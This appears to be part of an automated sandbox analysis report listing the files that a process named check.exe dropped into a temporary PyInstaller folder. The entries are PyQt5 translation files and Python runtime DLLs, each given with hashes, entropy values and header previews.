                                                                                                                                                                                                                                      Size (bytes):125763
                                                                                                                                                                                                                                      Entropy (8bit):4.80343609423322
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                                                      MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                                                      SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                                                      SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                                                      SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):194487
                                                                                                                                                                                                                                      Entropy (8bit):4.877239354585035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                                                      MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                                                      SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                                                      SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                                                      SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):158274
                                                                                                                                                                                                                                      Entropy (8bit):5.402056706327934
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                                                      MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                                                      SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                                                      SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                                                      SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):127849
                                                                                                                                                                                                                                      Entropy (8bit):5.83455389078597
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                                                      MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                                                      SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                                                      SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                                                      SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtCore.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                                                                                      Entropy (8bit):6.241719144701645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                                                      MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                                                      SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                                                      SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                                                      SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtGui.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2494976
                                                                                                                                                                                                                                      Entropy (8bit):6.232020603277999
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                                                      MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                                                      SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                                                      SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                                                      SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtWidgets.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5144576
                                                                                                                                                                                                                                      Entropy (8bit):6.262739223310643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                                                      MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                                                      SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                                                      SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                                                      SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\sip.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120320
                                                                                                                                                                                                                                      Entropy (8bit):6.034057886020456
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                                                      MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                                                      SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                                                      SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                                                      SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\VCRUNTIME140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120400
                                                                                                                                                                                                                                      Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                      MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                      SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                      SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                      SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):49744
                                                                                                                                                                                                                                      Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                                      MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                                      SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                                      SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                                      SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_bz2.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):84240
                                                                                                                                                                                                                                      Entropy (8bit):6.607563436050078
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                                                      MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                                                      SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                                                      SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                                                      SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_ctypes.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):131344
                                                                                                                                                                                                                                      Entropy (8bit):6.311142284249784
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                                                      MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                                                      SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                                                      SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                                                      SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_decimal.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):277776
                                                                                                                                                                                                                                      Entropy (8bit):6.5855511991551
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                                                      MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                                                      SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                                                      SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                                                      SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_hashlib.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):64272
                                                                                                                                                                                                                                      Entropy (8bit):6.220967684620152
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                                                      MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                                                      SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                                                      SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                                                      SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_lzma.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157968
                                                                                                                                                                                                                                      Entropy (8bit):6.854644275249963
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                                                      MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                                                      SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                                                      SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                                                      SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\_queue.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):33552
                                                                                                                                                                                                                                      Entropy (8bit):6.446391764486538
                                                                                                                                                                                                                                      Encrypted:false
